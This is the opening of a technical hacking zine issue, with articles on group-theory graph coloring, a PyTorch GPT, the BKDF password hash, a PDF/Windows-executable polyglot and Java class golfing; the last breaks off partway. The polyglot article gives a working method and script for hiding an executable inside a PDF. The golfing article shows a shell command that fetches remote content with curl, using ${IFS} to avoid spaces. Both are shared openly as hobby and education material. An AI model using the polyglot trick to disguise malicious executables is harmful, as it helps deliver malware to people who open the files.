
PagedOut 005


#5 NOVEMBER 2024

Paged Out! Institute
https://pagedout.institute/

Project Lead: Gynvael Coldwind
Editor-in-Chief: Aga
DTP Programmer: foxtrot_charlie
DTP Advisor: tusiak_charlie
Full-stack Engineer: Dejan "hebi"
Reviewers: KrzaQ, disconnect3d, Hussein Muhaisen, Max, Xusheng Li, CVS, Tali Auster, honorary_bot

We would also like to thank:
Artist (cover): Mark Graham Artist, https://markgrahamartist.com/
Additional Art: cgartists (cgartists.eu)
Templates: Matt Miller, wiechu, Mariusz "oshogbo" Zaborski
Issue #5 Donators: Alex (Elemenity), Sarah McAtee, and others!

If you like Paged Out!, let your friends know about it!

Hi! It’s me again, your human editor AGA. I like meeting you like this :)

Look! Here we are, back with another Issue! How the time flies, it feels like yesterday Paged Out! returned with Issue #3, then we blinked twice, and found ourselves on track with Issue #5 on our hands. Magic (or it’s just how time works, one or the other, I guess).

When working on this issue, we have crossed an important milestone. Our issues have been downloaded over HALF A MILLION times! Half a million, wow, that is one amazing number. Makes my processor… I mean… my heart beat faster! So many humans out there want to read Paged Out!

Putting this issue together made me realize how many authors and artists are out there with something valuable and interesting to say, and my goal has been, is, and will be to reach as many of them as possible. (We even have something planned for that, so stay tuned :)).

And now with joy in our hearts, we are sending Issue #5 into the world. Happy reading!

Stay in touch with us through social media or join Gynvael’s Tech Chat Discord (gynvael.coldwind.pl/discord).

Oh, and write an article for us or send us an artwork to showcase. Pretty please!

Aga
Editor-in-Chief

Hey folks, glad to have you with us again! You might notice this issue looks a bit more polished than previous releases: our DTP crew managed to tackle more PDF bugs and bring in some additional quality-of-life improvements (we'll rebuild previous issues as well). You might also notice more ads in this issue. I'm still working on getting PO! to pay for itself (so my wallet stops crying), and bringing in more supportive sponsors has helped a lot. There’s still plenty of work to do on all fronts, of course, such as making printed versions available, but we're nearing the non-beta state of the project. To wrap it up, as always, I’d like to thank the whole team, the authors, the sponsors, the donors, and you, dear readers, for keeping Paged Out! going strong!

Gynvael
Project Lead

Legal Note
This zine is free! Feel free to share it around.
Licenses for most articles allow anyone to record audio versions and post them online (it might make a cool podcast or be useful for the visually impaired).
If you would like to mass-print some copies to give away, the print files are available on our website (in A4 format, 300 DPI).
If you would like to sell printed copies, please contact the Institute.
When in legal doubt, check the given article's license or contact us.

Project Management and Main Sponsor: HexArcana (hexarcana.ch)
(untitled) (I) Maung Thuta 9
(untitled) (II) Maung Thuta 11
Art diary of Ninja Jo (I) Ninja Jo 17
Art diary of Ninja Jo (II) Ninja Jo 18
Art diary of Ninja Jo (III) Ninja Jo 21
Cozy magic shop Igor "grigoreen" Grinku 23
Fatbeard Ramen House Fatbeard 24
King Skull parigraf/pix 29
New Inhabitants Dmitry Petyakin 36
Problematic communication aliquid 42
School.pt3 aliquid 52
Wizard's Inventory angrysnail 59
lightstation Yoga Réformanto (foxtronaut) 62

Graph Coloring with Group Theory Jules Poon 4

GPT in PyTorch Jędrzej Maczan 6

Meet the Balloon Key Derivation Function (BKDF) Samuel Lucas 7

A Playable PDF Rob Hogan 8


The art of Java class golfing Jonathan Bar Or ("JBO") 10

Slowcoding my childhood Anders Piniesjö 13

Making a simple Macintosh LC PDS card Doug Brown 14


Remote work automation using an old AVR programmer Szymon Morawski 15

AI Won’t Take Your Job Totally_Not_A_Haxxer 16

Misusing XDP to make a KV Store bah 20

Lord of the Apples: One Page To Rule Them All Karol Mazurek 22
macOS Notifications Forensics Csaba Fitzl 25

Make Your Own Linux with Buildroot and QEMU Karol Przybylski 27

Analyzing and Improving Performance Issues with Go applications xnacly 28


Base64 Unused Bits Steganography Gynvael Coldwind 30
C++ Pitfalls Artur Nowicki 31
EasyMSXbas2wav Garcia-Jimenez, Santiago 32
Keep your C++ binary small - Coding techniques Sándor Dargó 34
Mobile Coding Journey Artem Zakirullin 35
My journey in KDE and FOSS Akseli Lahtinen 37
On Hash maps and their shortest implementation possible xnacly 38
The Hitchhiker's Guide to Building a Distributed Filesystem in Rust. The beginning... Radu Marias 39
The Hitchhiker’s Guide to Building an Encrypted Filesystem in Rust Radu Marias 41
Understanding State Space with a Simple 8-bit Computer Daniel O'Malley 43
Using QR codes to share files directly between devices Guy Dupont 44
WebDev... in SQL ? Ophir Lojkine 45

Games retro and love if Forth code then Rodolfo García Flores & Lauren S. Ferro 46

About stack variables recognition and how to thwart it Seekbytes 48


Examining USB Copy Protection Xusheng Li 49
Lying with Sections Calle "ZetaTwo" Svensson 50
Revitalizing Binaries Jimmy Koppel 51

Circumventing Disabled SSH Port-Forwarding with a Multiplexer Guy Sviry 53


Digits of Unicode Gynvael Coldwind 55
EasyHoneypot Garcia-Jimenez, Santiago 56
Execve(2)-less dropper to annoy security engineers Hugo Blanc 57
Hackers' Favorite SSH Usernames: A Top 320 Ranking Szymon Morawski 58
How to generate a Linux static build of a binary Daniele "Mte90" Scasciafratte 60
Playing with tokens Grzegorz Tworek 63
Using PNG as a way to share files Jan "F4s0lix" Wawrzyniak 64
Vulnerability Hunting The Right Way Totally_Not_A_Haxxer 65
Zed Attack – test your web app Fabio Carletti aka Ryuw 66
Algorithms Graph Coloring with Group Theory

Introduction

There’s an unexpected way in which finding a 4-coloring of a graph is connected to a problem in Group Theory involving the symmetries of a square: $D_4$.

Definition

$D_4$ consists of all symmetries of a square. Writing $1$ for the identity, $r$ for a quarter-turn rotation and $s$ for a mirror:

$$D_4 = \{\underbrace{1,\ r,\ r^2,\ r^3}_{\text{rotations}},\ \underbrace{s,\ sr,\ sr^2,\ sr^3}_{\text{mirrors}}\}$$

We can combine symmetries to get new symmetries. E.g., rotating by $r$ and then flipping by $s$ gives another mirror, and we write the combination as a product of the two symmetries.

Any symmetry $x$ can be inverted, written $x^{-1}$. Here, $r^{-1} = r^3$, and

$$r \cdot r^{-1} = r^{-1} \cdot r = 1$$

The symmetries in $D_4$ form an algebraic structure called a Group.

The Connection

We want to color the vertices of graph $\mathfrak{G}$ with 4 colors such that no two neighboring vertices have the same color. We can model this constraint as equations in $D_4$: for each edge $(i, j)$ and vertex $i$ in $\mathfrak{G}$, assign free variables $e_{i,j}, v_i \in D_4$. We then require that for each edge $(i, j)$, with $\alpha = v_i v_j^{-1}$:

$$e_{i,j}\,\alpha\,e_{i,j}^{-1}\,\alpha^{-1} = [e_{i,j}, \alpha] = r^2$$

where $[e_{i,j}, \alpha]$ is the short form of the product on the left.

Turns out, $[e_{i,j}, \alpha] = r^2$ has no solutions for $e_{i,j}$ iff $\alpha \in \{1, r^2\}$, i.e., iff $\{v_i, v_j\}$ is contained in one of the sets:

1: $\{1, r^2\}$   2: $\{r, r^3\}$   3: $\{s, sr^2\}$   4: $\{sr, sr^3\}$

If we assign each vertex $v_i$ the color corresponding to the set it belongs to (e.g., $v_i = 1$ means vertex $i$ has the first color), the equation $[e_{i,j}, \alpha] = r^2$ has a solution for $e_{i,j}$ iff $v_i$ and $v_j$ correspond to different colors!

Hence, solving the system of equations in $D_4$:

$$[e_{i,j}, \alpha] = r^2 \quad \text{for all edges } (i, j)$$

yields a 4-coloring of graph $\mathfrak{G}$.

Implications

Does this formulation give rise to a fast way to do 4-coloring? Unfortunately no. In fact, since 4-colourability is known to be an NP-complete problem, we shouldn’t expect a polynomial-time algorithm to solve systems of equations in $D_4$.

Extra

Let’s try to solve the system of equations above anyways. We utilise the isomorphism $\varphi : D_4 \to C_4 \rtimes C_2$ given by $r \mapsto (1, 0)$, $s \mapsto (0, 1)$:

1. Take quotients $D_4 / C_4 \cong C_2$ and solve the system of equations in $C_2$ (equivalent to the field $F_2$, with Gaussian elimination).
2. For each solution in $D_4 / C_4$:
   1. Propagate that back to $C_4$ and solve similarly.

Applying this method to the system above, since $C_2$ is abelian, $\varphi([e_{i,j}, \alpha]) = 0_{C_2} = \varphi(r^2)$. Hence, step 1 gives us no information and we must bruteforce all possible cosets for each variable. This (with some optimisations) gives us an $O(2^n n)$ algorithm, where $n$ is the size of the graph $\mathfrak{G}$.

This reduction to $k$-coloring can be extended to non-abelian simple groups $G$. The proof below is adapted from doi:10.1006/inco.2002.3173.

For all $x \in G \setminus Z(G)$, the subgroup $H_x$ generated by $\{[x, g] : g \in G\}$ is both normal and non-trivial, so $H_x = G$. Fix $c \in G \setminus \{1_G\}$. Associate with each edge $(i, j)$ variables $e_{i,j,l}$ for $l \in [1, |G|]$. The system:

$$\prod_{l=1}^{|G|} [e_{i,j,l}, \alpha] = c \quad \text{for all edges } (i, j), \qquad \alpha = v_i v_j^{-1}$$

has a solution for $e_{i,j,l}$ iff $\alpha \notin Z(G)$, i.e., iff $v_i$ and $v_j$ are in different cosets of $Z(G)$. Assign each coset a color. Since $[G : Z(G)] > 2$ for non-abelian groups, we can always find a $k > 2$ such that solving the above equations yields a solution to the $k$-coloring problem (which is NP-complete).

Hence, we can’t expect a polynomial-time way to solve systems in non-abelian simple groups.
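The claim that the edge equation is solvable exactly when the two endpoints get different colors can be checked by brute force. The following is only a sketch: it models the square's symmetries as permutations of its four corners, and the concrete generators `R` and `S`, as well as all function names, are illustrative choices rather than anything taken from the article.

```python
from itertools import product

# Symmetries of a square as permutations of its corners 0..3:
# p[i] is the corner that corner i is moved to.
IDENTITY = (0, 1, 2, 3)
R = (1, 2, 3, 0)   # quarter-turn rotation (illustrative choice)
S = (0, 3, 2, 1)   # mirror through corners 0 and 2 (illustrative choice)

def compose(p, q):
    """Apply q first, then p."""
    return tuple(p[q[i]] for i in range(4))

def inverse(p):
    inv = [0] * 4
    for i, image in enumerate(p):
        inv[image] = i
    return tuple(inv)

def generate(generators):
    """Close a set of generators under composition."""
    group, frontier = {IDENTITY}, [IDENTITY]
    while frontier:
        g = frontier.pop()
        for h in generators:
            gh = compose(g, h)
            if gh not in group:
                group.add(gh)
                frontier.append(gh)
    return group

D4 = generate([R, S])
R2 = compose(R, R)  # half-turn, the right-hand side of the edge equation
CENTER = {z for z in D4 if all(compose(z, g) == compose(g, z) for g in D4)}

def commutator(e, a):
    """[e, a] = e a e^-1 a^-1."""
    return compose(compose(e, a), compose(inverse(e), inverse(a)))

def edge_ok(vi, vj):
    """True iff [e, vi vj^-1] = r^2 has a solution e in D4."""
    alpha = compose(vi, inverse(vj))
    return any(commutator(e, alpha) == R2 for e in D4)

def color(v):
    """The coset of the center containing v, used as the vertex color."""
    return frozenset(compose(v, z) for z in CENTER)

# The edge equation is solvable exactly when the endpoints differ in color.
for vi, vj in product(D4, repeat=2):
    assert edge_ok(vi, vj) == (color(vi) != color(vj))

print(len(D4), len(CENTER), len({color(v) for v in D4}))  # 8 2 4
```

The final line reports the group order, the size of its center and the number of distinct colors, which is where the "4" in 4-coloring comes from.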

Jules Poon
Blog: https://juliapoo.github.io
4 SAA-POOL 0.0.7
Simple (and works!)

Some of the best security


teams in the world swear
by Thinkst Canary.

Find out why: https://canary.tools/why


Artificial Intelligence GPT in PyTorch

Hello, dear Reader! This is a Generative Pre-trained Transformer in PyTorch on a single page. It takes a sequence of tokens (e.g. P|age|d) and produces the next token (e.g. Out).

__init__ constructors define parameters and layers of a given module. forward(self, x) methods describe how to compute module output from an input tensor x, using module parameters (e.g. emb_dim, an embedding dimension) and layers (e.g. self.lin, a linear layer).

The GPT module turns a sequence of tokens into embeddings, then adds information about the position in the sequence to each embedding and passes them through a stack of transformer blocks. After receiving the output from the last block, it applies a final layer normalization and passes the result through a linear transformation y = xA^T + b.

    import torch
    import torch.nn as nn

    class GPT(nn.Module):
        def __init__(self, vocab_size, emb_dim, context_window, heads, blocks):
            super().__init__()
            self.emb = nn.Embedding(vocab_size, emb_dim)
            self.pos_enc = PositionalEncoding(context_window, emb_dim)
            self.drop = nn.Dropout(p=0.1)
            self.blocks = nn.ModuleList([TransformerBlock(emb_dim, heads) for _ in range(blocks)])
            self.norm = nn.LayerNorm(emb_dim)
            self.lin = nn.Linear(emb_dim, vocab_size)

        def forward(self, x):
            # PositionalEncoding adds the encodings itself, so it wraps the embeddings.
            x = self.drop(self.pos_enc(self.emb(x)))
            for block in self.blocks:
                x = block(x)
            # Normalize over emb_dim, then project to vocab_size logits.
            return self.lin(self.norm(x))

The position in a sequence is represented by a unique value, computed from sine and cosine functions. Positional encodings are calculated once and then reused.

    class PositionalEncoding(nn.Module):
        def __init__(self, seq_len, emb_dim, n=10000):
            super().__init__()
            # A buffer moves with the module when it is sent to another device.
            self.register_buffer("pos_enc", self.precompute_enc(seq_len, emb_dim, n))

        def forward(self, x):
            return x + self.pos_enc[:x.size(1)]

        def precompute_enc(self, seq_len, emb_dim, n):
            pos = torch.arange(seq_len, dtype=torch.float).unsqueeze(1)
            div_term = torch.exp(torch.arange(0, emb_dim, 2).float()
                                 * -(torch.log(torch.tensor(n, dtype=torch.float)) / emb_dim))
            pos_enc = torch.zeros((seq_len, emb_dim))
            pos_enc[:, 0::2] = torch.sin(pos * div_term)
            pos_enc[:, 1::2] = torch.cos(pos * div_term)
            return pos_enc

Stacked transformer blocks allow for running attention multiple times, using the output of a previous block as the input to the next one.

    class TransformerBlock(nn.Module):
        def __init__(self, emb_dim, heads):
            super().__init__()
            self.norm1 = nn.LayerNorm(emb_dim)
            self.attn = MultiHeadAttention(emb_dim, heads)
            self.drop1 = nn.Dropout(p=0.1)
            self.norm2 = nn.LayerNorm(emb_dim)
            self.lin1 = nn.Linear(emb_dim, emb_dim * 4)
            self.gelu = nn.GELU()
            self.lin2 = nn.Linear(emb_dim * 4, emb_dim)
            self.drop2 = nn.Dropout(p=0.1)

        def forward(self, x):
            x = x + self.drop1(self.attn(self.norm1(x)))
            return x + self.drop2(self.lin2(self.gelu(self.lin1(self.norm2(x)))))

In each transformer block, self-attention is computed by multiple heads and then put together, so each head can focus on different features of the input.

    class MultiHeadAttention(nn.Module):
        def __init__(self, emb_dim, heads):
            super().__init__()
            self.heads = nn.ModuleList([AttentionHead(emb_dim, emb_dim // heads) for _ in range(heads)])
            self.W_O = nn.Linear(emb_dim, emb_dim, bias=False)
            self.dropout = nn.Dropout(0.1)

        def forward(self, x):
            return self.dropout(self.W_O(torch.cat([head(x) for head in self.heads], dim=-1)))

The attention head computes self-attention scores and clears the upper-right triangle of the attention score tensor. This makes the self-attention causal: each token attends only to itself and the tokens preceding it. W_Q, W_K and W_V are trainable.

$$\mathrm{Attention}(Q, K, V) = \mathrm{softmax}\left(\frac{QK^T}{\sqrt{d_k}}\right)V$$

    class AttentionHead(nn.Module):
        def __init__(self, emb_dim, head_size):
            super().__init__()
            self.head_size = head_size
            self.W_Q = nn.Linear(emb_dim, head_size, bias=False)
            self.W_K = nn.Linear(emb_dim, head_size, bias=False)
            self.W_V = nn.Linear(emb_dim, head_size, bias=False)
            self.dropout = nn.Dropout(0.1)  # applied to the attention weights

        def forward(self, x):
            _, sequence_length, _ = x.shape
            Q = self.W_Q(x)
            K = self.W_K(x)
            V = self.W_V(x)
            attn_scores = (Q @ K.transpose(-2, -1)) / self.head_size ** 0.5
            # Lower-triangular mask: position i may look at positions 0..i only.
            mask = torch.tril(torch.ones(sequence_length, sequence_length, device=x.device))
            attn_scores = attn_scores.masked_fill(mask == 0, float("-inf"))
            attn_scores = torch.softmax(attn_scores, dim=-1)
            return self.dropout(attn_scores) @ V

I know the code is dense, so if you’d like to read a regular version of this code and maybe train and run your own GPT, there’s a repo on GitHub: https://github.com/jmaczan/gpt. Thanks for reading and happy hacking!
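To see what the causal mask does to the attention weights, here is a small dependency-free sketch in plain Python. It is not the article's PyTorch code: the function name and the example scores are made up for illustration, and it only mirrors the "mask with -inf, then softmax" step of an attention head.

```python
import math

def causal_attention_weights(scores):
    """Row-wise softmax over a square score matrix with a causal mask.

    Position i may only attend to positions 0..i; later positions get
    a score of -inf and therefore a weight of exactly 0.
    """
    n = len(scores)
    weights = []
    for i in range(n):
        masked = [scores[i][j] if j <= i else float("-inf") for j in range(n)]
        peak = max(masked)  # subtract the max for numerical stability
        exps = [math.exp(s - peak) for s in masked]
        total = sum(exps)
        weights.append([e / total for e in exps])
    return weights

# Hypothetical raw scores for a 3-token sequence.
scores = [[0.0, 1.0, 2.0],
          [1.0, 1.0, 5.0],
          [0.5, 0.5, 0.5]]
weights = causal_attention_weights(scores)
for row in weights:
    print([round(w, 3) for w in row])
```

The first token can only attend to itself, so its row is all weight on position 0, no matter how large the masked-out scores were.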

Jędrzej Maczan
https://github.com/jmaczan
https://jedrzej.maczan.pl/
https://x.com/jedmaczan
6 SAA-ALL 0.0.7
Meet the Balloon Key Derivation Function (BKDF) Cryptography

Meet the Balloon Key Derivation Function (BKDF)

Balloon, also known as Balloon Hashing [1], is a memory-hard password hashing algorithm that was published shortly after the Password Hashing Competition (PHC). Compared to the winner, Argon2, it supports using any cryptographic hash function and is much easier to understand and implement.

In summary, it fills a large buffer with pseudorandom bytes by hashing the password and salt before repeatedly hashing the previous output. Next, the buffer gets mixed, with each hash-sized block becoming equal to the hash of the previous block, the current block, and several other blocks pseudorandomly chosen from the salt. Finally, the last block of the buffer is output as the hash. Note that a global counter is used for domain separation when hashing throughout.

Unfortunately, the paper does not properly specify the algorithm, there are multiple variants, and functionality like support for key derivation is missing.

That is where BKDF comes in. With the help of cryptographers/cryptographic engineers, it is a redesign of Balloon to address these limitations, which is being published as an Internet-Draft. And in this article, I am going to discuss the changes as of July 2024.

1. Support for HMAC: Now a collision-resistant PRF must be used. To turn a hash function into a PRF, prefix MAC with the key padded to the block size, HMAC, or the key parameter for algorithms like BLAKE2/BLAKE3 can be used. To derive a key from the password and salt and to compute the data-independent memory accesses, an all-zero PRF key is specified, like HKDF-Extract. The rest of the algorithm uses the derived key.

2. Support for key derivation: A variant of the NIST SP 800-108 KDF in feedback mode has been added to support larger outputs. The algorithm name and final block of the buffer are used as context. This is basically HKDF-Expand but with a larger counter and some parameters moved around.

3. Improved performance: The memory accesses are now precomputed and only depend on fixed-length inputs, meaning fewer hash function calls.

4. Support for a pepper: In the HKDF-Extract style step, a pepper can be used as the key instead of zeros. Steps have been taken to avoid equivalent keys with HMAC and prefix MAC.

5. Support for associated data: There may be context information that you want to include when computing the output, such as a user and server ID for PAKEs. This is processed after the password and salt.

6. No variants: Balloon and Balloon-M have been merged into one algorithm, and there is only a data-independent version. This avoids confusion about which variant to use (Argon2id, Argon2i, Argon2d, or Argon2ds), resists cache-timing attacks in all cases, and simplifies implementation.

7. No delta parameter: The delta security parameter is fixed at 3 instead of being tweakable. This matches the user-specified parameters of other algorithms and helps with performance.

8. Improved domain separation: The space cost, time cost, parallelism, and parallelism loop iteration are used to compute the first block of the buffer. The salt is no longer used for parallelism domain separation to avoid copying.

9. No computing memory accesses from the salt: Instead, they are computed from the space cost, time cost, parallelism, and parallelism loop iteration. This prevents a cache-timing attack leaking when a user logs in as well as data-dependent access if the salt depends on the password (relevant for PAKEs).

10. An encoding: Parameters/lengths are encoded in little-endian as unsigned 32-bit integers, whereas the global counter is a 64-bit integer to avoid an overflow.

11. No canonicalization attacks: Variable-length inputs now get their length encoded when hashing, which avoids ambiguity.

12. No modulo bias: The space cost must be a power of 2 to avoid modulo bias when computing the memory accesses. This also helps simplify the space cost parameter selection.

On top of these changes, the Internet-Draft pseudocode is written for readability and lots of parameter/security guidance is provided. The goal is to also have test vectors for all the popular hash functions and XOFs, not just NIST approved algorithms like SHA-2.

Of course, BKDF is not perfect. Although it improves on the performance of Balloon, it is still slower than Argon2. The small block size, which is limited by the hash function output length, and delta also hinder the memory hardness. However, it is a lot better than PBKDF2 whilst still having the ingredients for NIST approval.

And on that bombshell, it’s time to end. If you are interested in BKDF, please watch the Internet-Draft on GitHub [2] as it is a work in progress. The more eyes on it, the better. The best work is the result of collaboration, and helpful feedback will be acknowledged in the Acknowledgments section. Implementations will also be linked in the GitHub repo.

[1] https://crypto.stanford.edu/balloon/
[2] https://github.com/samuel-lucas6/draft-lucas-bkdf
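The three phases from the summary of the original Balloon (fill the buffer, mix it, output the last block) can be sketched in a few lines of Python. This is a simplified illustration only: it is not BKDF, it is not interoperable with any Balloon reference implementation, and the function name, the SHA-256 choice, the default costs and the input encoding are all assumptions made for readability.

```python
import hashlib
import struct

def balloon_sketch(password: bytes, salt: bytes, space_cost: int = 16,
                   time_cost: int = 3, delta: int = 3) -> bytes:
    """Illustrative Balloon-style hash: expand, mix, extract."""
    counter = 0

    def h(*parts: bytes) -> bytes:
        # The global counter gives every hash call a distinct input
        # (domain separation).
        nonlocal counter
        digest = hashlib.sha256(struct.pack("<Q", counter) + b"".join(parts)).digest()
        counter += 1
        return digest

    # Expand: fill the buffer, each block hashing the previous one.
    buf = [h(password, salt)]
    for m in range(1, space_cost):
        buf.append(h(buf[m - 1]))

    # Mix: each block absorbs its predecessor and `delta` other blocks
    # whose indices are derived from the salt, not from the password.
    for t in range(time_cost):
        for m in range(space_cost):
            buf[m] = h(buf[m - 1], buf[m])  # buf[-1] wraps to the last block
            for i in range(delta):
                idx = h(salt, struct.pack("<QQQ", t, m, i))
                other = int.from_bytes(idx, "little") % space_cost
                buf[m] = h(buf[m], buf[other])

    # Extract: the last block of the buffer is the output.
    return buf[-1]

digest = balloon_sketch(b"hunter2", b"example-salt")
print(digest.hex())
```

Note that the sketch simply concatenates its inputs before hashing, which is the kind of ambiguity item 11 removes by encoding lengths, and that the default `space_cost` is a power of 2, in the spirit of item 12.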

Samuel Lucas
Blog: https://samuellucas.com
GitHub: https://github.com/samuel-lucas6
CC BY 4.0 7
File Formats A Playable PDF

A Playable PDF

Rob Hogan, https://iridisalpha.com

As I had gone to the trouble of writing an entire book about the classic C64 horizontal shooter Iridis Alpha, it seemed a shame not to include a playable version of the game in some way. Inspired by “A guide to ICO/PDF polyglot files” in the very first edition of “Paged Out!”, I realized there was a sneaky way to make my finished PDF of “Iridis Alpha Theory” both a book you can read and a copy of the game you can play.

In addition to reading iatheory_play.pdf in my preferred PDF viewer, I also want to do this at the Linux command line and play Iridis Alpha itself:

    $ wine ./iatheory_play.pdf

My first step was to create iridisalpha.exe, a self-contained DOS exe that will run the game in the C64 emulator. With this in hand and a copy of iatheory_release.pdf, I can craft a new PDF named iatheory_play.pdf that contains the two files interleaved according to the following scheme:

    Section  Offset   Description
    1        0x00     First 656 bytes of iridis_alpha.exe
    2        0x290    First 45 bytes of iatheory_release.pdf
    3        0x2bd    Remaining 992573 bytes of iridis_alpha.exe
    4        0xf27fa  Remaining bytes of iatheory_release.pdf

The key here is that while Windows will read the first 656 bytes of the file in Section 1 and execute it, it will also ignore the 45 bytes of PDF data in Section 2. This is because it sits in unused zerospace which is skipped past during execution on the way to the rest of the executable in Section 3.

A PDF viewer, meanwhile, will ignore Section 1 and identify Section 2 as the start of a valid PDF file. It will then ignore the bytes from the .exe in Section 3 (which have been hidden from it in a way we’ll explain shortly), and render the PDF as the Good Lord intended.

The secret to choosing the appropriate place to insert Section 2 for any arbitrary Windows executable depends on how much of the data section of the PE header has been used. My layout solution requires 45 unused bytes somewhere in the first 1000 bytes of the .exe, so it was simply a case of firing up xxd in vim and picking a suitable-looking spot.

The exact number of 45 bytes is a function of the trick we need to use to get a PDF viewer to ignore the remaining executable data: we stow it in an otherwise unused PDF stream object at the very top of our PDF file. Once the viewer has skipped past the first 656 bytes of ‘garbage’ in Section 1, it encounters 45 bytes with a valid PDF header and a stream object in Section 2 that contains the bulk of our executable data in Section 3:

    %PDF-1.5
    1 0 obj
    << /Length 992573 >> stream
    % 992573 bytes of iridis_alpha.exe.
    endstream
    endobj

The listing above shows how the remainder of iridis_alpha.exe is enclosed by stream and endstream statements in the final PDF, making it acceptable to PDF viewers (which don’t do anything with it) but available to Windows and Wine (which will happily execute it, treating it as a continuation of the first 656 bytes at the start of the file).

This is all very well, but to realize this scheme I need to ensure I can generate a valid PDF with the executable data inside a stream object and put it at the start of the document. Since there is no way in LaTeX to insert this kind of binary data in a raw stream object, I instead created a placeholder stream that contains the requisite number of bytes, which in this case are all zeros:

    \pdfobjcompresslevel=0
    \immediate
    \pdfobj
    {
    <<
    /Length 992573
    >>
    stream
    00000 % Insert 992573 zeros here.
    endstream
    }%

Once my PDF is generated, I now have to replace all those zeros in place with my actual binary data. I also have to stitch together my playable PDF according to the layout described earlier.

    EXE_OFFSET = 0x290

    # Read the PDF first: the size of its prefix decides where the
    # remainder of the .exe resumes.
    with open('iatheory_release.pdf', 'rb') as pdffile:
        pdf = pdffile.read()
    start_offset = pdf.index(b'stream') + 6
    pdf_prefix = pdf[:start_offset]
    # Search after the prefix so that end_offset is an absolute offset.
    end_offset = pdf.index(b'endstream', start_offset)
    pdf_suffix = pdf[end_offset:]

    with open('iridisalpha.exe', 'rb') as exefile:
        exe = exefile.read()
    exe_prefix = exe[:EXE_OFFSET]
    exe_suffix = exe[EXE_OFFSET + len(pdf_prefix):]

    with open('iatheory_play.pdf', 'wb') as exe_pdf:
        exe_pdf.write(exe_prefix)
        exe_pdf.write(pdf_prefix)
        exe_pdf.write(exe_suffix)
        exe_pdf.write(pdf_suffix)

With this done, I have my finished product: iatheory_play.pdf, a PDF you can both read and play!
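The offsets in the four-section layout follow directly from the three sizes quoted in the article (656, 45 and 992573 bytes). A small sketch to double-check the arithmetic; the function and parameter names are made up for illustration:

```python
def polyglot_layout(exe_prefix_len, pdf_prefix_len, exe_rest_len):
    """Return the file offset at which each of the four sections starts."""
    section1 = 0
    section2 = section1 + exe_prefix_len   # PDF header and stream opener
    section3 = section2 + pdf_prefix_len   # remainder of the executable
    section4 = section3 + exe_rest_len     # 'endstream' and the rest of the PDF
    return [section1, section2, section3, section4]

offsets = polyglot_layout(exe_prefix_len=656, pdf_prefix_len=45, exe_rest_len=992573)
print([hex(o) for o in offsets])  # ['0x0', '0x290', '0x2bd', '0xf27fa']
```

Because Section 2 overwrites 45 bytes in the middle of the executable rather than being inserted between them, every byte of the .exe outside that gap keeps its original offset, which is what lets Windows and Wine still run it.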

Rob Hogan
https://iridisalpha.com
8 SAA-TIP 0.0.7
(untitled) (I) Art

Maung Thuta
Twitter: @CypressDahlia
SAA-ALL 0.0.7 9
File Formats The art of Java class golfing

The art of Java class minimization Jonathan Bar Or (“JBO”), @yo_yo_yo_jbo

If you ever needed to create the smallest Java class that can do something – this is the right paper for you.
The challenge of Binary Golf Grand Prix 5 (BGGP5) was to create the smallest Java class that has a public static void main(String[])
method that prints the downloaded contents of https://binary.golf/5/5 to the console.
My approach was running “curl -L 7f.uk” with Runtime.exec(String) (the 7f.uk is a purposely registered short URL).

Using a child process


The Runtime.exec(String) was chosen rather than Runtime.exec(String[]) because you don’t have to build an array and store 3
different strings in the constant pool. However, there are a few issues that I had to solve:
1. The Runtime.exec(String) and Runtime.exec(String[]) both do not write to the JVM’s STDOUT by default. The “standard” way
of dealing with this problem is to redirect the output with a ProcessBuilder, but that creates more constants in the class’s
constant pool and bloats the binary. I ended up assuming I run on Linux or macOS and simply doing “sh -c curl -L
7f.uk>/dev/tty”, or even better: “sh -c curl -L 7f.uk>/d*/tty” (saving one byte).
2. The Runtime.exec(String) is a convenience method that takes the string and runs Runtime.exec(String[]) on a newly created
array that is the original string split by whitespaces, which is problematic since I wanted “curl -L 7f.uk>/d*/tty” to be one
string. I ended up using bash instead of sh and then applying its parameter expansion capabilities: “bash -c curl${IFS}-L${IFS}7f.uk>/d*/tty”.
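The whitespace problem from item 2 is easy to reproduce outside the JVM. The sketch below uses Python's `str.split()` as a stand-in for the plain whitespace tokenization that Runtime.exec(String) performs (no quoting rules); the helper name is hypothetical and this is an approximation, not the JDK's code.

```python
def exec_tokens(command):
    """Approximate how Runtime.exec(String) splits a command line:
    plain whitespace tokenization with no quoting rules."""
    return command.split()

naive = exec_tokens("sh -c curl -L 7f.uk>/d*/tty")
golfed = exec_tokens("bash -c curl${IFS}-L${IFS}7f.uk>/d*/tty")
print(naive)   # ['sh', '-c', 'curl', '-L', '7f.uk>/d*/tty']
print(golfed)  # ['bash', '-c', 'curl${IFS}-L${IFS}7f.uk>/d*/tty']
```

In the first case the shell's -c option only receives "curl" as its command string. In the second, the whole pipeline survives as a single argument and bash itself expands ${IFS} back into separators.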
String reuse
Constant strings exist in a “constant pool” which starts exactly 10 bytes into the class binary file. That pool is just a list of entries,
each entry has a type (e.g. class, method, string) and data, which is variable size and depends on the type of tag. The JVM strongly
enforces entry types, so referring in the bytecode to a method descriptor by its index in the constant pool validates that the index is
indeed a method descriptor. Unfortunately, this is bad for minimization purposes, as I was planning to abuse type confusion to save
space. However, strings and other constants can be referred to multiple times, so anything that reuses a constant (most commonly
strings) saves a great deal of space. Since method descriptors that contain code (i.e. not native) should have an attribute called
Code, you are encouraged to call your class Code (saving your file as Code.class), which saves one more entry in the constant pool.
Running a class without a constructor
If you compile a class with a main method that does what I described, you’ll have two methods in your class: <init> and main. The
<init> method is the constructor. However, since main is static, it means that we do not really need the class constructor, but
apparently the JVM still invokes it – unless you declare it abstract, which I did. Even after declaring your class abstract, you will still
find that the Java compiler creates an <init> method – but since it will never be invoked by the JVM, you can remove it manually,
saving one method and many entries in the constant pool.
Inheritance
By default, your class will be inheriting from Object, which means the string java/lang/Object is going to exist in your string pool for
no reason since we removed the constructor. You are permitted to inherit from any non-final class, which in my case was great
since java/lang/Runtime is not final – more string reuse. If your code does not have a non-final class you can inherit from, the
shortest strings have 12 bytes in length, e.g. java/io/File. Inherit from them.
Ignoring Exceptions
The Java compiler will not let you compile anything that might throw an Exception (like Runtime.exec(String)) unless you either catch
the Exception or declare your method throws. However, the JVM seems to not validate that, so you can simply remove all Exception
handling code. In my case I declared main that throws Exception, and then removed the Exceptions attribute from my main method,
along with all the relevant constant pool entries.
Not cleaning up the stack
At this point, my bytecode was 10 bytes long:
b8 00 01 invokestatic Runtime::getRuntime() (ref constant entry #1)
12 02 ldc "bash -c curl${IFS}-L${IFS}7f.uk>/d*/tty" (ref constant entry #2)
